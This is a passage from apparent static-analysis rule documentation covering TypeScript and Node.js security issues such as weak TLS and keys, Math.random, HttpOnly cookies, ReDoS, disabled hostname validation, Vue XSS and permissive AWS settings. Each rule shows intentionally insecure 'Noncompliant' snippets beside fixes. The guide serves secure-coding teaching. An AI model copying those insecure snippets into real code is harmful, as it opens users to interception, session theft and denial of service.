  secureOptions:
    constants.SSL_OP_NO_SSLv2
    | constants.SSL_OP_NO_SSLv3
    | constants.SSL_OP_NO_TLSv1
    | constants.SSL_OP_NO_TLSv1_1
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

typescript:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the Math.random() function relies on a weak pseudorandom number generator, this function should not be used for security-critical applications or for protecting sensitive data. In such context, a cryptographically strong pseudorandom number generator (CSPRNG) should be used instead.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a cryptographically strong pseudorandom number generator (CSPRNG) like crypto.getRandomValues().
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

const val = Math.random(); // Sensitive
// Check if val is used in a security context.

Compliant Solution

// === Client side ===
const crypto = window.crypto || window.msCrypto;
var array = new Uint32Array(1);
crypto.getRandomValues(array); // Compliant for security-sensitive use cases

// === Server side ===
const crypto = require('crypto');
const buf = crypto.randomBytes(1); // Compliant for security-sensitive use cases

See

typescript:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Node.js

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 1024,  // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('dsa', {
    modulusLength: 1024,  // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPair('ec', {
    namedCurve: 'secp112r2', // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Compliant solution

Here is an example of a private key generation with RSA:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 2048,
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('dsa', {
    modulusLength: 2048,
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPair('ec', {
    namedCurve: 'secp224k1',
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

typescript:S5757

Log management is an important topic, especially for the security of a web application, to ensure user activity, including potential attackers, is recorded and available for an analyst to understand what’s happened on the web application in case of malicious activities.

Retention of specific logs for a defined period of time is often necessary to comply with regulations such as GDPR, PCI DSS and others. However, to protect user’s privacy, certain informations are forbidden or strongly discouraged from being logged, such as user passwords or credit card numbers, which obviously should not be stored or at least not in clear text.

Ask Yourself Whether

In a production environment:

  • The web application uses confidential information and logs a significant amount of data.
  • Logs are externalized to SIEM or Big Data repositories.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Loggers should be configured with a list of confidential, personal information that will be hidden/masked or removed from logs.

Sensitive Code Example

With Signale log management framework the code is sensitive when an empty list of secrets is defined:

const { Signale } = require('signale');

const CREDIT_CARD_NUMBERS = fetchFromWebForm()
// here we suppose the credit card numbers are retrieved somewhere and CREDIT_CARD_NUMBERS looks like ["1234-5678-0000-9999", "1234-5678-0000-8888"]; for instance

const options = {
  secrets: []         // empty list of secrets
};

const logger = new Signale(options); // Sensitive

CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});

Compliant Solution

With Signale log management framework it is possible to define a list of secrets that will be hidden in logs:

const { Signale } = require('signale');

const CREDIT_CARD_NUMBERS = fetchFromWebForm()
// here we suppose the credit card numbers are retrieved somewhere and CREDIT_CARD_NUMBERS looks like ["1234-5678-0000-9999", "1234-5678-0000-8888"]; for instance

const options = {
  secrets: ["([0-9]{4}-?)+"]
};

const logger = new Signale(options); // Compliant

CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});

See

typescript:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guaranties that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session-cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session-cookie
  • the HttpOnly attribute offer an additional protection (not the case for an XSRF-TOKEN cookie / CSRF token for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most of the cookies and it’s mandatory for session / sensitive-security cookies.

Sensitive Code Example

cookie-session module:

let session = cookieSession({
  httpOnly: false,// Sensitive
});  // Sensitive

express-session module:

const express = require('express'),
const session = require('express-session'),

let app = express()
app.use(session({
  cookie:
  {
    httpOnly: false // Sensitive
  }
})),

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: false // Sensitive
}); // Sensitive

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { httpOnly: false }}); // Sensitive

Compliant Solution

cookie-session module:

let session = cookieSession({
  httpOnly: true,// Compliant
});  // Compliant

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    httpOnly: true // Compliant
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: true // Compliant
}); // Compliant

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { httpOnly: true }}); // Compliant

See

typescript:S4784

This rule is deprecated; use S5852 instead.

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following characters: *+{ .

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine performance decrease with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the one engine you’re are using.

Use if possible a library which is not vulnerable to Redos Attacks such as Google Re2.

Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.

Sensitive Code Example

const regex = /(a+)+b/; // Sensitive
const regex2 = new RegExp("(a+)+b"); // Sensitive

str.search("(a+)+b"); // Sensitive
str.match("(a+)+b"); // Sensitive
str.split("(a+)+b"); // Sensitive

Note: String.matchAll does not raise any issue as it is not supported by NodeJS.

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both side of a "|".

See

typescript:S5759

Users often connect to web servers through HTTP proxies.

Proxy can be configured to forward the client IP address via the X-Forwarded-For or Forwarded HTTP headers.

IP address is a personal information which can identify a single user and thus impact his privacy.

Ask Yourself Whether

  • The web application uses reverse proxies or similar but doesn’t need to know the IP address of the user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

User IP address should not be forwarded unless the application needs it, as part of an authentication, authorization scheme or log management for examples.

Sensitive Code Example

node-http-proxy

var httpProxy = require('http-proxy');

httpProxy.createProxyServer({target:'http://localhost:9000', xfwd:true}) // Noncompliant
  .listen(8000);

http-proxy-middleware

var express = require('express');

const { createProxyMiddleware } = require('http-proxy-middleware');

const app = express();

app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true, xfwd: true })); // Noncompliant
app.listen(3000);

Compliant Solution

node-http-proxy

var httpProxy = require('http-proxy');

// By default xfwd option is false
httpProxy.createProxyServer({target:'http://localhost:9000'}) // Compliant
  .listen(8000);

http-proxy-middleware

var express = require('express');

const { createProxyMiddleware } = require('http-proxy-middleware');

const app = express();

// By default xfwd option is false
app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true})); // Compliant
app.listen(3000);

See

typescript:S6281

By default S3 buckets are private, it means that only the bucket owner can access it.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies or ACLs to be set on a S3 bucket the following booleans settings can be enabled:

  • blockPublicAcls: to block or not public ACLs to be set to the S3 bucket.
  • ignorePublicAcls: to consider or not existing public ACLs set to the S3 bucket.
  • blockPublicPolicy: to block or not public policies to be set to the S3 bucket.
  • restrictPublicBuckets: to restrict or not the access to the S3 endpoints of public policies to the principals within the bucket owner account.

The other attribute BlockPublicAccess.BLOCK_ACLS only turns on blockPublicAcls and ignorePublicAcls. The public policies can still affect the S3 bucket.

However, all of those options can be enabled by setting the blockPublicAccess property of the S3 bucket to BlockPublicAccess.BLOCK_ALL.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • blockPublicAcls to True to block new attempts to set public ACLs.
  • ignorePublicAcls to True to block existing public ACLs.
  • blockPublicPolicy to True to block new attempts to set public policies.
  • restrictPublicBuckets to True to restrict existing public policies.

Sensitive Code Example

By default, when not set, the blockPublicAccess is fully deactivated (nothing is blocked):

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket'
}); // Sensitive

This block_public_access allows public ACL to be set:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: new s3.BlockPublicAccess({
        blockPublicAcls         : false, // Sensitive
        blockPublicPolicy       : true,
        ignorePublicAcls        : true,
        restrictPublicBuckets   : true
    })
});

The attribute BLOCK_ACLS only blocks and ignores public ACLs:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: s3.BlockPublicAccess.BLOCK_ACLS // Sensitive
});

Compliant Solution

This blockPublicAccess blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL
});

A similar configuration to the one above can be obtained by setting all parameters of the blockPublicAccess

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: new s3.BlockPublicAccess({
        blockPublicAcls         : true,
        blockPublicPolicy       : true,
        ignorePublicAcls        : true,
        restrictPublicBuckets   : true
    })
});

See

typescript:S2255

This rule is deprecated, and will eventually be removed.

Using cookies is security-sensitive. It has led in the past to the following vulnerabilities:

Attackers can use widely-available tools to read cookies. Any sensitive information they may contain will be exposed.

This rule flags code that writes cookies.

Ask Yourself Whether

  • sensitive information is stored inside the cookie.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Cookies should only be used to manage the user session. The best practice is to keep all user-related information server-side and link them to the user session, never sending them to the client. In a very few corner cases, cookies can be used for non-sensitive information that need to live longer than the user session.

Do not try to encode sensitive information in a non human-readable format before writing them in a cookie. The encoding can be reverted and the original information will be exposed.

Using cookies only for session IDs doesn’t make them secure. Follow OWASP best practices when you configure your cookies.

As a side note, every information read from a cookie should be Sanitized.

Sensitive Code Example

// === Built-in NodeJS modules ===
const http = require('http');
const https = require('https');

http.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
https.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
// === ExpressJS ===
const express = require('express');
const app = express();
app.use(function(req, res, next) {
  res.cookie('name', 'John'); // Sensitive
});
// === In browser ===
// Set cookie
document.cookie = "name=John"; // Sensitive

See

typescript:S2817

This rule is deprecated, and will eventually be removed.

Why is this an issue?

The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some browsers. (It is not supported in Firefox or IE.)

Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.

Noncompliant code example

var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024);  // Noncompliant

Resources

typescript:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Node.js

Code examples

The following code contains examples of disabled hostname validation.

The hostname validation gets disabled by overriding checkServerIdentity with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  checkServerIdentity: function() {}, // Noncompliant
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});
const tls = require('node:tls');

let options = {
  checkServerIdentity: function() {}, // Noncompliant
  secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

Compliant solution

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});
const tls = require('node:tls');

let options = {
  secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Standards

typescript:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

const crypto = require("crypto");

const hash = crypto.createHash('sha1'); // Sensitive

Compliant Solution

const crypto = require("crypto");

const hash = crypto.createHash('sha512'); // Compliant

See

typescript:S6299

Vue.js framework prevents XSS vulnerabilities by automatically escaping HTML contents with the use of native API browsers like innerText instead of innerHtml.

It’s still possible to explicity use innerHtml and similar APIs to render HTML. Accidentally rendering malicious HTML data will introduce an XSS vulnerability in the application and enable a wide range of serious attacks like accessing/modifying sensitive information or impersonating other users.

Ask Yourself Whether

The application needs to render HTML content which:

  • could be user-controlled and not previously sanitized.
  • is difficult to understand how it was constructed.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid injecting HTML content with v-html directive unless the content can be considered 100% safe, instead try to rely as much as possible on built-in auto-escaping Vue.js features.
  • Take care when using the v-bind:href directive to set URLs which can contain malicious Javascript (javascript:onClick(...)).
  • Event directives like :onmouseover are also prone to Javascript injection and should not be used with unsafe values.

Sensitive Code Example

When using Vue.js templates, the v-html directive enables HTML rendering without any sanitization:

<div v-html="htmlContent"></div> <!-- Noncompliant -->

When using a rendering function, the innerHTML attribute enables HTML rendering without any sanitization:

Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerHTML: this.htmlContent, // Noncompliant
        }
      }
    );
  },
});

When using JSX, the domPropsInnerHTML attribute enables HTML rendering without any sanitization:

<div domPropsInnerHTML={this.htmlContent}></div> <!-- Noncompliant -->

Compliant Solution

When using Vue.js templates, putting the content as a child node of the element is safe:

<div>{{ htmlContent }}</div>

When using a rendering function, using the innerText attribute or putting the content as a child node of the element is safe:

Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerText: this.htmlContent,
        }
      },
      this.htmlContent // Child node
    );
  },
});

When using JSX, putting the content as a child node of the element is safe:

<div>{this.htmlContent}</div>

See

typescript:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. Suppose an identity has permission to access all resources even though it only requires access to some non-sensitive ones. In this case, unauthorized access and disclosure of sensitive information will occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to apply the least privilege principle, i.e., by only granting access to necessary resources. A good practice to achieve this is to organize or tag resources depending on the sensitivity level of data they store or process. Therefore, managing a secure access control is less prone to errors.

Sensitive Code Example

The wildcard "*" is specified as the resource for this PolicyStatement. This grants the update permission for all policies of the account:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [
        new iam.PolicyStatement({
            effect: iam.Effect.ALLOW,
            actions: ["iam:CreatePolicyVersion"],
            resources: ["*"] // Sensitive
        })
    ]
})

Compliant Solution

Restrict the update permission to the appropriate subset of policies:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [
        new iam.PolicyStatement({
            effect: iam.Effect.ALLOW,
            actions: ["iam:CreatePolicyVersion"],
            resources: ["arn:aws:iam:::policy/team1/*"]
        })
    ]
})

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used.)
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources.)

See

typescript:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

url = "http://example.com"; // Sensitive
url = "ftp://anonymous@example.com"; // Sensitive
url = "telnet://anonymous@example.com"; // Sensitive

For nodemailer:

const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: false, // Sensitive
  requireTLS: false // Sensitive
});
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({}); // Sensitive

For ftp:

var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': false // Sensitive
});

For telnet-client:

const Telnet = require('telnet-client'); // Sensitive

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationLoadBalancer:

import { ApplicationLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const alb = new ApplicationLoadBalancer(this, 'ALB', {
  vpc: vpc,
  internetFacing: true
});

alb.addListener('listener-http-default', {
  port: 8080,
  open: true
}); // Sensitive

alb.addListener('listener-http-explicit', {
  protocol: ApplicationProtocol.HTTP, // Sensitive
  port: 8080,
  open: true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationListener:

import { ApplicationListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new ApplicationListener(this, 'listener-http-explicit-constructor', {
  loadBalancer: alb,
  protocol: ApplicationProtocol.HTTP, // Sensitive
  port: 8080,
  open: true
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkLoadBalancer:

import { NetworkLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const nlb = new NetworkLoadBalancer(this, 'nlb', {
  vpc: vpc,
  internetFacing: true
});

var listenerNLB = nlb.addListener('listener-tcp-default', {
  port: 1234
}); // Sensitive

listenerNLB = nlb.addListener('listener-tcp-explicit', {
  protocol: Protocol.TCP, // Sensitive
  port: 1234
});

For aws-cdk-lib.aws-elasticloadbalancingv2.NetworkListener:

import { NetworkListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new NetworkListener(this, 'listener-tcp-explicit-constructor', {
  loadBalancer: nlb,
  protocol: Protocol.TCP, // Sensitive
  port: 8080
});

For aws-cdk-lib.aws-elasticloadbalancingv2.CfnListener:

import { CfnListener } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

new CfnListener(this, 'listener-http', {
  defaultActions: defaultActions,
  loadBalancerArn: alb.loadBalancerArn,
  protocol: "HTTP", // Sensitive
  port: 80
});

new CfnListener(this, 'listener-tcp', {
  defaultActions: defaultActions,
  loadBalancerArn: alb.loadBalancerArn,
  protocol: "TCP", // Sensitive
  port: 80
});

For aws-cdk-lib.aws-elasticloadbalancing.CfnLoadBalancer:

import { CfnLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancing';

new CfnLoadBalancer(this, 'elb-tcp', {
  listeners: [{
    instancePort: '1000',
    loadBalancerPort: '1000',
    protocol: 'tcp' // Sensitive
  }]
});

new CfnLoadBalancer(this, 'elb-http', {
  listeners: [{
    instancePort: '1000',
